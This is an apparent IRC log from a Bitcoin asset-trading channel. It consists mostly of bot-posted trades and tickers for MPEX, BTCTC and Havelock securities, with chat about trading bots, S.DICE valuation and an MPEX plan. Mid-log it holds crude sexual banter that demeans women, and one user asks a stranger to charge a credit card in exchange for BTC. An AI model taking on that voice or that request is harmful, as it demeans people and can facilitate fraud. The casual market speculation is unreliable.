[+] Feb 03 12:16:52 [MPEX] [S.MPOE] 1847 @ 0.00068211 = 1.2599 BTC [+] Feb 03 12:17:22 ok i am gonna get some sleep Feb 03 12:17:26 good night everyone Feb 03 12:19:14 Hmm, I shall do the same I suppose Feb 03 12:26:38 mjr_ do you know how the bot works at all ? Feb 03 12:26:53 aw lol too late. Feb 03 12:38:40 [MPEX] [S.MPOE] 5528 @ 0.00067985 = 3.7582 BTC [-] Feb 03 13:00:14 [MPEX] [S.DICE] 1800 @ 0.00738112 = 13.286 BTC [+] Feb 03 13:07:13 [MPEX] [S.MPOE] 4321 @ 0.00067202 = 2.9038 BTC [-] Feb 03 13:07:14 [MPEX] [S.MPOE] 4122 @ 0.00067985 = 2.8023 BTC [+] Feb 03 13:07:16 [MPEX] [S.MPOE] 757 @ 0.00067195 = 0.5087 BTC [-] Feb 03 13:08:21 [MPEX] [S.MPOE] 4321 @ 0.0006722 = 2.9046 BTC [+] Feb 03 13:08:23 [MPEX] [S.MPOE] 11829 @ 0.00067195 = 7.9485 BTC [-] Feb 03 13:12:30 [MPEX] [S.MPOE] 1814 @ 0.00067195 = 1.2189 BTC [-] Feb 03 13:12:32 [MPEX] [S.MPOE] 950 @ 0.00067002 = 0.6365 BTC [-] Feb 03 13:22:47 [MPEX] [S.MPOE] 3764 @ 0.00067002 = 2.522 BTC [-] Feb 03 13:22:48 [MPEX] [S.MPOE] 5000 @ 0.00067001 = 3.3501 BTC [-] Feb 03 13:22:50 [MPEX] [S.MPOE] 27881 @ 0.00067 = 18.6803 BTC [-] Feb 03 13:26:30 [MPEX] [S.MPOE] 1206 @ 0.00068202 = 0.8225 BTC [+] Feb 03 13:28:55 [MPEX] [S.MPOE] 63000 @ 0.00067 = 42.21 BTC [-] Feb 03 13:30:54 [MPEX] [S.MPOE] 4800 @ 0.00067 = 3.216 BTC [-] Feb 03 13:35:36 [MPEX] [S.MPOE] 3115 @ 0.00068202 = 2.1245 BTC [+] Feb 03 13:35:37 [MPEX] [S.MPOE] 10000 @ 0.0006821 = 6.821 BTC [+] Feb 03 13:35:38 [MPEX] [S.MPOE] 13653 @ 0.00068211 = 9.3128 BTC [+] Feb 03 13:35:40 [MPEX] [S.MPOE] 4530 @ 0.0006833 = 3.0953 BTC [+] Feb 03 13:39:58 [MPEX] [S.MPOE] 4321 @ 0.00067444 = 2.9143 BTC [-] Feb 03 13:40:00 [MPEX] [S.MPOE] 12174 @ 0.00067412 = 8.2067 BTC [-] Feb 03 13:50:15 [MPEX] [S.MPOE] 6700 @ 0.00067999 = 4.5559 BTC [+] Feb 03 13:50:17 [MPEX] [S.MPOE] 4226 @ 0.00067412 = 2.8488 BTC [-] Feb 03 13:50:19 [MPEX] [S.MPOE] 5541 @ 0.00067 = 3.7125 BTC [-] Feb 03 13:50:20 [MPEX] [S.MPOE] 2 @ 0.00066855 = 0.0013 BTC [-] Feb 03 13:52:29 [BTCTC] [GSDPT] 250 @ 0.0079 = 1.975 BTC [+] Feb 03 13:57:19 [MPEX] [S.MPOE] 9998 @ 0.00066855 = 6.6842 BTC [-] Feb 03 13:57:21 [MPEX] [S.MPOE] 2852 @ 0.00066854 = 1.9067 BTC [-] Feb 03 13:58:24 [MPEX] [S.MPOE] 3000 @ 0.00066854 = 2.0056 BTC [-] Feb 03 13:58:28 [MPEX] [S.DICE] 234 @ 0.00738112 = 1.7272 BTC [+] Feb 03 13:58:30 [MPEX] [S.DICE] 9466 @ 0.007186 = 68.0227 BTC [-] Feb 03 13:58:33 [MPEX] [S.DICE] 300 @ 0.00718504 = 2.1555 BTC [-] Feb 03 14:01:36 [MPEX] [S.MPOE] 8800 @ 0.00066854 = 5.8832 BTC [-] Feb 03 14:01:38 [MPEX] [S.DICE] 10 @ 0.007395 = 0.074 BTC [+] Feb 03 14:02:02 [MPEX] [S.DICE] 9990 @ 0.007395 = 73.8761 BTC [+] Feb 03 14:10:03 [MPEX] [S.MPOE] 2724 @ 0.0006832 = 1.861 BTC [+] Feb 03 14:14:49 [BTCTC] [GSDPT] 1 @ 0.0076 BTC [-] Feb 03 14:15:41 [MPEX] [S.MPOE] 1837 @ 0.00066854 = 1.2281 BTC [-] Feb 03 14:15:44 [MPEX] [S.MPOE] 1863 @ 0.00066733 = 1.2432 BTC [-] Feb 03 14:22:44 [MPEX] [S.MPOE] 10000 @ 0.00066734 = 6.6734 BTC [+] Feb 03 14:25:57 [MPEX] [S.MPOE] 5006 @ 0.00066958 = 3.3519 BTC [+] Feb 03 14:27:14 [MPEX] [S.MPOE] 1597 @ 0.0006832 = 1.0911 BTC [+] Feb 03 14:27:16 [MPEX] [S.MPOE] 12154 @ 0.0006833 = 8.3048 BTC [+] Feb 03 14:29:14 [MPEX] [S.MPOE] 4321 @ 0.0006831 = 2.9517 BTC [-] Feb 03 14:29:16 [MPEX] [S.MPOE] 1112 @ 0.0006833 = 0.7598 BTC [+] Feb 03 14:29:17 [MPEX] [S.MPOE] 1725 @ 0.00068331 = 1.1787 BTC [+] Feb 03 14:31:16 [HAVELOCK] [SDICE] 5 @ 0.81 = 4.05 BTC [-] Feb 03 14:31:18 [HAVELOCK] [SDICE] 5 @ 0.81 = 4.05 BTC [-] Feb 03 14:33:14 [HAVELOCK] [SDICE] 5 @ 0.8 = 4 BTC [-] Feb 03 14:36:47 [MPEX] [S.MPOE] 2650 @ 0.00068039 = 1.803 BTC [-] Feb 03 14:50:25 [MPEX] [S.MPOE] 1656 @ 0.00068331 = 1.1316 BTC [+] Feb 03 14:52:55 [MPEX] [S.MPOE] 1671 @ 0.00068039 = 1.1369 BTC [-] Feb 03 14:52:57 [MPEX] [S.MPOE] 4029 @ 0.00068023 = 2.7406 BTC [-] Feb 03 14:59:03 [MPEX] [S.MPOE] 4321 @ 0.00068308 = 2.9516 BTC [+] Feb 03 14:59:10 [MPEX] [S.MPOE] 29246 @ 0.00068331 = 19.9841 BTC [+] Feb 03 14:59:13 [MPEX] [S.MPOE] 2933 @ 0.00068334 = 2.0042 BTC [+] Feb 03 15:01:00 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 03 15:12:31 [MPEX] [S.MPOE] 4321 @ 0.00068043 = 2.9401 BTC [-] Feb 03 15:12:33 [MPEX] [S.MPOE] 4979 @ 0.00068023 = 3.3869 BTC [-] Feb 03 15:16:02 [MPEX] [S.MPOE] 4321 @ 0.00068317 = 2.952 BTC [+] Feb 03 15:16:04 [MPEX] [S.MPOE] 7347 @ 0.00068334 = 5.0205 BTC [+] Feb 03 15:17:39 [MPEX] [S.MPOE] 293 @ 0.00068334 = 0.2002 BTC [+] Feb 03 15:17:41 [MPEX] [S.MPOE] 7408 @ 0.00068335 = 5.0623 BTC [+] Feb 03 15:20:55 [BTCTC] [GSDPT] 526 @ 0.0076 = 3.9976 BTC [-] Feb 03 15:21:43 [MPEX] [S.MPOE] 5641 @ 0.00068023 = 3.8372 BTC [-] Feb 03 15:28:43 [BTCTC] [GSDPT] 3 @ 0.0076 = 0.0228 BTC [-] Feb 03 15:31:13 [MPEX] [S.MPOE] 4321 @ 0.00066734 = 2.8836 BTC [-] Feb 03 15:31:15 [MPEX] [S.MPOE] 13137 @ 0.00066733 = 8.7667 BTC [-] Feb 03 15:31:16 [MPEX] [S.MPOE] 842 @ 0.00066732 = 0.5619 BTC [-] Feb 03 15:50:11 [MPEX] [S.MPOE] 4321 @ 0.00067424 = 2.9134 BTC [+] Feb 03 15:50:13 [MPEX] [S.MPOE] 10365 @ 0.00067425 = 6.9886 BTC [+] Feb 03 15:52:50 [MPEX] [S.MPOE] 4321 @ 0.00066738 = 2.8837 BTC [-] Feb 03 15:52:52 [MPEX] [S.MPOE] 4321 @ 0.00066738 = 2.8837 BTC [-] Feb 03 15:52:53 [MPEX] [S.MPOE] 10000 @ 0.00066733 = 6.6733 BTC [-] Feb 03 15:52:55 [MPEX] [S.MPOE] 5558 @ 0.00066732 = 3.709 BTC [-] Feb 03 16:23:54 [MPEX] [S.MPOE] 4194 @ 0.00067425 = 2.8278 BTC [+] Feb 03 16:23:56 [MPEX] [S.MPOE] 4321 @ 0.00068294 = 2.951 BTC [+] Feb 03 16:23:58 [MPEX] [S.MPOE] 4885 @ 0.00068295 = 3.3362 BTC [+] Feb 03 16:25:16 [HAVELOCK] [SDICE] 10 @ 0.79811111 = 7.9811 BTC [-] Feb 03 16:25:17 [HAVELOCK] [SDICE] 5 @ 0.8 = 4 BTC [+] Feb 03 16:25:19 [HAVELOCK] [SDICE] 3 @ 0.82 = 2.46 BTC [+] Feb 03 16:30:14 [MPEX] [S.MPOE] 4321 @ 0.00066733 = 2.8835 BTC [-] Feb 03 16:30:16 [MPEX] [S.MPOE] 10000 @ 0.00066733 = 6.6733 BTC [-] Feb 03 16:30:18 [MPEX] [S.MPOE] 7720 @ 0.00066732 = 5.1517 BTC [-] Feb 03 16:33:10 [MPEX] [S.MPOE] 4321 @ 0.00066733 = 2.8835 BTC [+] Feb 03 16:33:12 [MPEX] [S.MPOE] 1829 @ 0.00066732 = 1.2205 BTC [-] Feb 03 16:34:04 [BTCTC] [GSDPT] 1662 @ 0.0076 = 12.6312 BTC [-] Feb 03 16:40:42 [BTCTC] [GSDPT] 1562 @ 0.0076 = 11.8712 BTC [-] Feb 03 16:41:10 [MPEX] [S.MPOE] 5205 @ 0.0006823 = 3.5514 BTC [+] Feb 03 16:41:12 [MPEX] [S.MPOE] 4321 @ 0.00068283 = 2.9505 BTC [+] Feb 03 16:41:14 [MPEX] [S.MPOE] 6624 @ 0.00068295 = 4.5239 BTC [+] Feb 03 16:41:49 !ticker mpex s.dice Feb 03 16:41:51 [MPEX:S.DICE] 1D: 0.00703438 / 0.0073198 / 0.007395 (103771 shares, 759.58 BTC), 7D: 0.00534524 / 0.00731703 / 0.00749999 (650155 shares, 4,757.20 BTC), 30D: 0.00085848 / 0.004984 / 0.0075 (6312291 shares, 31,460.47 BTC) Feb 03 16:42:16 [HAVELOCK] [SDICE] 2 @ 0.8 = 1.6 BTC [-] Feb 03 16:47:56 Damn. My Ipod went thru the washer Feb 03 16:47:58 RIP Feb 03 16:48:24 [MPEX] [S.MPOE] 4321 @ 0.0006819 = 2.9465 BTC [-] Feb 03 16:48:25 [MPEX] [S.MPOE] 11100 @ 0.00068202 = 7.5704 BTC [+] Feb 03 16:48:27 [MPEX] [S.MPOE] 4224 @ 0.00068295 = 2.8848 BTC [+] Feb 03 16:48:28 [MPEX] [S.MPOE] 1755 @ 0.00068309 = 1.1988 BTC [+] Feb 03 16:56:22 [MPEX] [S.DICE] 1450 @ 0.00730924 = 10.5984 BTC [-] Feb 03 16:57:00 [MPEX] [S.MPOE] 7900 @ 0.00068003 = 5.3722 BTC [-] Feb 03 16:57:02 [MPEX] [S.MPOE] 2047 @ 0.00068299 = 1.3981 BTC [+] Feb 03 17:00:26 [MPEX] [S.DICE] 999 @ 0.00739499 = 7.3876 BTC [+] Feb 03 17:04:15 [MPEX] [S.MPOE] 2527 @ 0.00067071 = 1.6949 BTC [-] Feb 03 17:04:53 [BTCTC] [B.YABMC] 10 @ 0.0244 = 0.244 BTC [-] Feb 03 17:04:55 [BTCTC] [B.YABMC] 10 @ 0.0244 = 0.244 BTC [-] Feb 03 17:07:15 [BTCTC] [B.YABMC] 125 @ 0.0245 = 3.0625 BTC [+] Feb 03 17:09:12 [MPEX] [S.MPOE] 2274 @ 0.00068299 = 1.5531 BTC [+] Feb 03 17:09:14 [MPEX] [S.MPOE] 9126 @ 0.00068309 = 6.2339 BTC [+] Feb 03 17:12:02 The neurosurgeon returns Feb 03 17:12:43 Yo Feb 03 17:13:07 give me s.dice as a present Feb 03 17:13:08 jkjk Feb 03 17:18:34 [BTCTC] [GSDPT] 250 @ 0.0076 = 1.9 BTC [-] Feb 03 17:20:26 [MPEX] [S.MPOE] 10963 @ 0.00068309 = 7.4887 BTC [+] Feb 03 17:21:11 [MPEX] [S.MPOE] 3550 @ 0.00068156 = 2.4195 BTC [-] Feb 03 17:28:10 [MPEX] [S.MPOE] 573 @ 0.00067527 = 0.3869 BTC [-] Feb 03 17:28:12 [MPEX] [S.MPOE] 2827 @ 0.00066756 = 1.8872 BTC [-] Feb 03 17:33:10 [MPEX] [S.MPOE] 1494 @ 0.00066756 = 0.9973 BTC [-] Feb 03 17:33:12 [MPEX] [S.MPOE] 4086 @ 0.00066732 = 2.7267 BTC [-] Feb 03 17:34:34 [BTCTC] [GSDPT] 50 @ 0.0076 = 0.38 BTC [-] Feb 03 17:55:54 [MPEX] [S.MPOE] 4321 @ 0.00067566 = 2.9195 BTC [+] Feb 03 17:55:56 [MPEX] [S.MPOE] 6619 @ 0.00067597 = 4.4742 BTC [+] Feb 03 17:55:57 [MPEX] [S.MPOE] 3060 @ 0.00068053 = 2.0824 BTC [+] Feb 03 17:56:30 [MPEX] [S.MPOE] 2826 @ 0.00068053 = 1.9232 BTC [+] Feb 03 17:56:32 [MPEX] [S.MPOE] 7274 @ 0.00068129 = 4.9557 BTC [+] Feb 03 18:08:03 [MPEX] [S.DICE] 743 @ 0.00739499 = 5.4945 BTC [+] Feb 03 18:10:04 [MPEX] [S.MPOE] 4321 @ 0.0006753 = 2.918 BTC [-] Feb 03 18:13:48 [MPEX] [S.MPOE] 4321 @ 0.00068101 = 2.9426 BTC [+] Feb 03 18:13:50 [MPEX] [S.MPOE] 5193 @ 0.00068129 = 3.5379 BTC [+] Feb 03 18:23:17 [MPEX] [S.MPOE] 6800 @ 0.00067543 = 4.5929 BTC [-] Feb 03 18:23:19 [MPEX] [S.MPOE] 500 @ 0.0006752 = 0.3376 BTC [-] Feb 03 18:26:10 [MPEX] [S.MPOE] 3821 @ 0.0006752 = 2.5799 BTC [-] Feb 03 18:26:12 [MPEX] [S.MPOE] 29979 @ 0.00067499 = 20.2355 BTC [-] Feb 03 18:32:05 [MPEX] [S.MPOE] 4321 @ 0.00067514 = 2.9173 BTC [+] Feb 03 18:32:10 [MPEX] [S.MPOE] 9879 @ 0.00067499 = 6.6682 BTC [-] Feb 03 18:35:27 [MPEX] [S.MPOE] 4321 @ 0.00068108 = 2.9429 BTC [+] Feb 03 18:35:29 [MPEX] [S.MPOE] 7329 @ 0.00068129 = 4.9932 BTC [+] Feb 03 18:40:55 [MPEX] [S.MPOE] 4321 @ 0.00068103 = 2.9427 BTC [-] Feb 03 18:40:57 [MPEX] [S.MPOE] 9079 @ 0.00068129 = 6.1854 BTC [+] Feb 03 18:59:21 kakobreklaaa: Does BBET make "house bets"? Feb 03 19:05:42 ;;ticker Feb 03 19:05:42 BTCUSD ticker | Best bid: 19.95222, Best ask: 19.99999, Bid-ask spread: 0.04777, Last trade: 19.99999, 24 hour volume: 27460.22150849, 24 hour low: 19.31000, 24 hour high: 20.20000, 24 hour vwap: 19.88694 Feb 03 19:05:49 ;;bc,24hprc Feb 03 19:05:51 19.86 Feb 03 19:06:24 thestringpuller: u cant know Feb 03 19:07:01 hey bugpowder Feb 03 19:07:10 i built a cool little thing Feb 03 19:07:30 https://mega.co.nz/#!okpFSZ7B!cuclFyKX_j1C-Ub7LJoeRHM2OzREhD6camzHMQ60gnY Feb 03 19:07:33 here's a link Feb 03 19:07:37 hey, anyone want to charge 10 bux on his cc for me ? Feb 03 19:07:39 ill pay btc. Feb 03 19:09:15 bugpowder: you can check out my code if you want... https://mega.co.nz/#!pgJVRTIK!eZas-A-jyC2W0B6BYT43fn-GdjdmMAw7jyB5ckh-AZI Feb 03 19:09:37 [MPEX] [S.MPOE] 3393 @ 0.00068129 = 2.3116 BTC [+] Feb 03 19:11:28 thestringpuller yes Feb 03 19:12:37 [MPEX] [S.MPOE] 256 @ 0.00068309 = 0.1749 BTC [+] Feb 03 19:12:39 [MPEX] [S.MPOE] 4844 @ 0.00068335 = 3.3101 BTC [+] Feb 03 19:14:25 that script looks exploitable. Feb 03 19:15:09 possibly Feb 03 19:17:37 ;;ticker Feb 03 19:17:37 BTCUSD ticker | Best bid: 20.10331, Best ask: 20.23999, Bid-ask spread: 0.13668, Last trade: 20.24000, 24 hour volume: 29151.83119077, 24 hour low: 19.31000, 24 hour high: 20.40000, 24 hour vwap: 19.91192 Feb 03 19:18:03 20.40 Feb 03 19:18:05 noice Feb 03 19:18:12 time to start the rally again. Feb 03 19:19:24 [MPEX] [S.DICE] 1007 @ 0.00739499 = 7.4468 BTC [+] Feb 03 19:23:52 mjr_ oh nevermind that script doesn't actually place trades, just provides info. Feb 03 19:23:55 Cool. Feb 03 19:24:46 I'm taking a break from bot dev for a few weeks. I had good news in the job hunt process and need to devote 99% of my attention there. Feb 03 19:25:42 [MPEX] [S.MPOE] 4321 @ 0.00068147 = 2.9446 BTC [-] Feb 03 19:25:44 [MPEX] [S.MPOE] 16079 @ 0.00068131 = 10.9548 BTC [-] Feb 03 19:36:03 [MPEX] [S.DICE] 1526 @ 0.00739499 = 11.2848 BTC [+] Feb 03 19:37:16 [HAVELOCK] [SDICE] 10 @ 0.794 = 7.94 BTC [-] Feb 03 19:39:16 [HAVELOCK] [SDICE] 4 @ 0.7945 = 3.178 BTC [+] Feb 03 19:39:18 [HAVELOCK] [SDICE] 1 @ 0.7945 BTC [+] Feb 03 19:40:27 [MPEX] [S.MPOE] 4321 @ 0.00068327 = 2.9524 BTC [+] Feb 03 19:40:29 [MPEX] [S.MPOE] 5000 @ 0.00068334 = 3.4167 BTC [+] Feb 03 19:40:34 [MPEX] [S.MPOE] 7499 @ 0.00068335 = 5.1244 BTC [+] Feb 03 19:41:16 [HAVELOCK] [SDICE] 4 @ 0.795 = 3.18 BTC [+] Feb 03 19:44:13 ;;ticker Feb 03 19:44:14 BTCUSD ticker | Best bid: 20.50000, Best ask: 20.52884, Bid-ask spread: 0.02884, Last trade: 20.55000, 24 hour volume: 31309.07006435, 24 hour low: 19.31000, 24 hour high: 20.60000, 24 hour vwap: 19.96266 Feb 03 19:44:17 OH YEAH Feb 03 19:47:46 [MPEX] [S.MPOE] 740 @ 0.00068131 = 0.5042 BTC [-] Feb 03 19:47:47 [MPEX] [S.MPOE] 4250 @ 0.00067621 = 2.8739 BTC [-] Feb 03 19:47:52 [MPEX] [S.MPOE] 4321 @ 0.000675 = 2.9167 BTC [-] Feb 03 19:47:55 [MPEX] [S.MPOE] 9840 @ 0.00067499 = 6.6419 BTC [-] Feb 03 19:51:13 bugpowder: i need to set up an interface Feb 03 19:51:30 i think it would be relatively easy to give it that logic and use pympex Feb 03 19:51:36 [MPEX] [S.MPOE] 3155 @ 0.00067523 = 2.1304 BTC [+] Feb 03 19:51:51 then just keep track of your orders using statjson i guess Feb 03 19:52:20 is it 50 yet ? Feb 03 19:52:55 but since i don't have mpex yet i can't test it out Feb 03 19:53:02 but you are welcome to, or anyone else Feb 03 19:53:15 it works best late at night (not sure about timezone stuff) Feb 03 19:54:39 over 60 Feb 03 19:55:04 why is the price volatile? Feb 03 19:55:07 ;;ticker Feb 03 19:55:08 BTCUSD ticker | Best bid: 20.60438, Best ask: 20.60533, Bid-ask spread: 0.00095, Last trade: 20.60438, 24 hour volume: 32384.31332794, 24 hour low: 19.31000, 24 hour high: 20.60438, 24 hour vwap: 19.98742 Feb 03 19:55:19 20.60 Feb 03 19:55:20 that is Feb 03 19:55:22 you know... if bitcoin was a girl 20'd be a very good place to be. Feb 03 19:55:22 I had like 4 people from school come ask me about bitcoin yesterday... Feb 03 19:55:30 YUP Feb 03 19:55:43 Also my local bar wants to accept bitcoin... Feb 03 19:55:52 bitcoin is mainstream now? Feb 03 19:56:00 not yet Feb 03 19:56:19 mircea_popescu: my ip changed so your paywall is neglecting me Feb 03 19:56:54 ;) Feb 03 19:57:51 cool. Feb 03 19:58:14 not mainstream yet but getting sluttier by the week Feb 03 19:58:27 sort of like the sophomore collegiate. Feb 03 19:59:01 wtf college did you go to? Feb 03 19:59:18 I got laid once in all of college Feb 03 19:59:29 so I feel I was lied to about the "liberal girls" Feb 03 19:59:33 i pretty much went to whore school. Feb 03 19:59:48 and there are no little mircea's running around? Feb 03 19:59:57 thestringpuller: you're about the same age as me, right? Feb 03 20:00:07 yea Feb 03 20:00:08 not afaik. Feb 03 20:00:20 hmm, how did you not get laid as much as you wanted to? Feb 03 20:00:29 he prolly didn't ask. Feb 03 20:00:57 too busy trying to code and make money Feb 03 20:01:04 hustling + getting laid don't go together Feb 03 20:01:07 unless you're a pimp Feb 03 20:01:13 then it's part of the business model Feb 03 20:01:16 heh, now that I think of it, that was a fairly good pickup line. "do you want to have sex over there?" Feb 03 20:01:46 I need to go to the country towns and pick up hot farm girls. Feb 03 20:02:17 [MPEX] [S.MPOE] 9691 @ 0.00068146 = 6.604 BTC [+] Feb 03 20:02:18 [MPEX] [S.MPOE] 944 @ 0.00067523 = 0.6374 BTC [-] Feb 03 20:02:18 smickles being recently out of a shower is all the pick-up line you need Feb 03 20:03:24 i dunno. I often waited untill a girl complimented my hair, and that most often came after not showering for a day or so Feb 03 20:03:48 smickles: I feel like you were married in college :P Feb 03 20:04:09 just after Feb 03 20:06:38 [MPEX] [S.MPOE] 2049 @ 0.00068335 = 1.4002 BTC [+] Feb 03 20:06:40 [MPEX] [S.MPOE] 4321 @ 0.00068368 = 2.9542 BTC [+] Feb 03 20:06:41 [MPEX] [S.MPOE] 930 @ 0.00068369 = 0.6358 BTC [+] Feb 03 20:07:59 well, in some application one day is recently. Feb 03 20:10:54 everyone is getting married and having children Feb 03 20:10:57 mircea_popescu are you saying that basically being clean is sexually arousing? Feb 03 20:11:02 while I'm just here masturbating Feb 03 20:11:35 jcpham you ever been around college dorms ? Feb 03 20:11:46 never ever ever Feb 03 20:12:08 in many cases just not being filthy is sufficient competitive advantage. Feb 03 20:12:15 except for when i stayed in the dorms in college Feb 03 20:12:16 [HAVELOCK] [SDICE] 5 @ 0.79252525 = 3.9626 BTC [-] Feb 03 20:13:52 [MPEX] [S.MPOE] 7732 @ 0.00068369 = 5.2863 BTC [+] Feb 03 20:13:54 [MPEX] [S.MPOE] 8518 @ 0.00068398 = 5.8261 BTC [+] Feb 03 20:14:26 [MPEX] [S.MPOE] 222 @ 0.00067523 = 0.1499 BTC [-] Feb 03 20:14:27 [BTCTC] [BASIC-MINING] 10 @ 0.35 = 3.5 BTC [+] Feb 03 20:14:28 [MPEX] [S.MPOE] 1700 @ 0.00067504 = 1.1476 BTC [-] Feb 03 20:14:29 [MPEX] [S.MPOE] 4321 @ 0.000675 = 2.9167 BTC [-] Feb 03 20:14:29 [MPEX] [S.MPOE] 2457 @ 0.00067499 = 1.6585 BTC [-] Feb 03 20:15:05 [MPEX] [S.MPOE] 1482 @ 0.00068398 = 1.0137 BTC [+] Feb 03 20:15:08 [MPEX] [S.MPOE] 4321 @ 0.00068432 = 2.9569 BTC [+] Feb 03 20:15:10 [MPEX] [S.MPOE] 6350 @ 0.00068433 = 4.3455 BTC [+] Feb 03 20:15:11 [MPEX] [S.MPOE] 3147 @ 0.00068507 = 2.1559 BTC [+] Feb 03 20:19:14 http://trilema.com/2013/so-whats-the-plan-with-mpoempex/ btw, if anyone missed it. Feb 03 20:25:38 i like how the citations have links to nude girls Feb 03 20:27:59 [MPEX] [S.MPOE] 1700 @ 0.00068502 = 1.1645 BTC [-] Feb 03 20:28:01 [MPEX] [S.MPOE] 4321 @ 0.00068503 = 2.96 BTC [+] Feb 03 20:28:03 [MPEX] [S.MPOE] 4595 @ 0.00068507 = 3.1479 BTC [+] Feb 03 20:29:10 [MPEX] [S.MPOE] 2708 @ 0.00068507 = 1.8552 BTC [+] Feb 03 20:29:12 [MPEX] [S.MPOE] 10210 @ 0.00068507 = 6.9946 BTC [+] Feb 03 20:31:16 [HAVELOCK] [HIM] 1 @ 13.88 BTC [+] Feb 03 20:31:35 one must have slipped in Feb 03 20:31:54 o, you mean the salo screencap ? Feb 03 20:34:39 "It is perhaps worth nothing that various observers.." <-- i think there's a t too much in "nothing" Feb 03 20:35:13 you mean a h Feb 03 20:35:55 I was about to point out the h Feb 03 20:36:17 ty to teh both of you. fixed. Feb 03 20:36:26 i mean te bot of you Feb 03 20:37:17 [HAVELOCK] [HIM] 2 @ 13.88 = 27.76 BTC [+] Feb 03 20:39:10 the website might go? How would we know the order book? Feb 03 20:39:11 [BTCTC] [GSDPT] 1360 @ 0.0074 = 10.064 BTC [-] Feb 03 20:39:25 JSON API would stay? Feb 03 20:40:09 prolly end up with dedicated terminals Feb 03 20:44:59 Eh, why not keep MPEx indefinitly Feb 03 20:47:48 sooner or later data feeds would be leased, some sort of equivalent of bloomberg will spring up Feb 03 20:47:51 etc. Feb 03 20:48:19 [MPEX] [S.MPOE] 15263 @ 0.00067546 = 10.3095 BTC [-] Feb 03 20:48:58 i have no idea, i'm speculating. Feb 03 20:49:52 [MPEX] [S.DICE] 300 @ 0.00735414 = 2.2062 BTC [-] Feb 03 20:49:54 [MPEX] [S.DICE] 1524 @ 0.00735413 = 11.2077 BTC [-] Feb 03 20:58:22 http://www.hardwaresecrets.com/blog/Hantol-PSU-Fake-PFC-Made-of-cement/220 Feb 03 20:58:25 this is pretty out there. Feb 03 21:01:54 [MPEX] [S.MPOE] 6564 @ 0.00067546 = 4.4337 BTC [-] Feb 03 21:01:56 [MPEX] [S.MPOE] 9790 @ 0.00068507 = 6.7068 BTC [+] Feb 03 21:02:00 [MPEX] [S.MPOE] 5133 @ 0.0006852 = 3.5171 BTC [+] Feb 03 21:02:32 lol nice link Feb 03 21:03:04 cement dude Feb 03 21:03:10 the new supermaterial from china Feb 03 21:03:12 yeah, thats messed Feb 03 21:03:28 wold be pissed to pay s/h for that Feb 03 21:03:28 :P Feb 03 21:07:09 [BTCTC] [B.YABMC] 120 @ 0.0245 = 2.94 BTC [+] Feb 03 21:07:19 [MPEX] [S.DICE] 743 @ 0.00735413 = 5.4641 BTC [-] Feb 03 21:09:10 [BTCTC] [B.YABMC] 30 @ 0.0245 = 0.735 BTC [+] Feb 03 21:14:50 hi all Feb 03 21:15:11 mjr_ lol there is a front runner on mpoe for long time...it doesn't even try to conceal itself Feb 03 21:15:50 [MPEX] [S.DICE] 830 @ 0.00739499 = 6.1378 BTC [+] Feb 03 21:21:52 [MPEX] [S.DICE] 33 @ 0.00735413 = 0.2427 BTC [-] Feb 03 21:21:54 [MPEX] [S.DICE] 267 @ 0.00733496 = 1.9584 BTC [-] Feb 03 21:22:10 oh Feb 03 21:22:11 https://bitcointalk.org/index.php?topic=101902.msg1499197#msg1499197 Feb 03 21:22:14 lol Feb 03 21:23:32 mjr_ and coinbr api isn't planned in near future, sorry. i just concluded whole thing isn't ready Feb 03 21:23:46 "Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later." Feb 03 21:23:52 cant access bitcointalk smickles :) Feb 03 21:24:26 Ukto_: it's usagi saying that he did a fundamental anal. of s.dice, and it's worth .5 btc per share Feb 03 21:24:51 lol Feb 03 21:24:59 and your opinion of that is ? :P Feb 03 21:25:13 [BTCTC] [B.YABMC] 11 @ 0.0246 = 0.2706 BTC [+] Feb 03 21:25:16 [MPEX] [S.DICE] 383 @ 0.00733496 = 2.8093 BTC [-] Feb 03 21:25:17 that guy has a proven record of valuing bitcoind denomenated assets Feb 03 21:25:18 [MPEX] [S.DICE] 470 @ 0.00728282 = 3.4229 BTC [-] Feb 03 21:25:19 [MPEX] [S.DICE] 835 @ 0.0072416 = 6.0467 BTC [-] Feb 03 21:25:31 0 for 12, or so Feb 03 21:25:34 [BTCTC] [B.YABMC] 17 @ 0.0247 = 0.4199 BTC [+] Feb 03 21:26:40 502 Bad Gateway Feb 03 21:26:42 forum rox Feb 03 21:26:43 same Feb 03 21:27:11 smickles lol Feb 03 21:27:34 mircea_popescu: would be interested in your opinion when/if the forums come back Feb 03 21:27:52 re what ? Feb 03 21:28:08 as for sites that work. apparently someone agrees with usagi Feb 03 21:28:10 https://bitfunder.com/asset/G.SDICE Feb 03 21:28:13 look at todays trades Feb 03 21:29:30 what about it ? Feb 03 21:29:38 alot of traes for today Feb 03 21:29:40 for sdice Feb 03 21:29:47 volume wise Feb 03 21:29:54 the div day was one thing Feb 03 21:29:59 we wouldnt know cause assbot. Feb 03 21:30:01 but this is about 2x avg already Feb 03 21:30:06 hehe Feb 03 21:30:09 [MPEX] [S.MPOE] 4321 @ 0.00067506 = 2.9169 BTC [-] Feb 03 21:30:10 [MPEX] [S.MPOE] 1748 @ 0.000675 = 1.1799 BTC [-] Feb 03 21:30:12 bbl Feb 03 21:30:13 kako: LOL Feb 03 21:30:17 dont wrry Feb 03 21:30:21 api will be opening up more soon Feb 03 21:30:39 what does that have to do anything with it Feb 03 21:30:41 [BTCTC] [RSM] 100 @ 0.011 = 1.1 BTC [+] Feb 03 21:30:58 that chart ain't half bad Ukto_ Feb 03 21:31:09 besides, I would hate to flood the channel with BF's massive trades (eyes roll) :P Feb 03 21:31:14 I will sell for 1/2 of usagi's valuation Feb 03 21:31:16 [HAVELOCK] [HIM] 1 @ 13.89 BTC [+] Feb 03 21:31:33 thanks, I was debating adding some more details to it one the other 'things' are done I todl you about Feb 03 21:31:48 the first one is more than halfway now. might get it released tomorrow if I am lucky hehe Feb 03 21:31:56 o hey, this is pretty juicy : http://en.wikipedia.org/wiki/Jim_Bell Feb 03 21:32:05 After his April 2000 release, Bell publicly announced that he believed that there was extensive Federal Government corruption associated with his 1997–2000 criminal case, and that he was going to research the facts and file a lawsuit. Bell filed this lawsuit in 2003.[5] Bell was put under heavy surveillance and rearrested for harassment and stalking of federal agents. He was charged with intimidation and stalking and Feb 03 21:32:05 was convicted and again imprisoned, this time for a decade-long sentence. Bell protested vociferously against the conduct of the trial, going so far as to file civil lawsuits against two judges, at least two prosecutors, his former probation officers, and his defense attorneys, but ultimately to no avail. Feb 03 21:32:28 Ukto_: 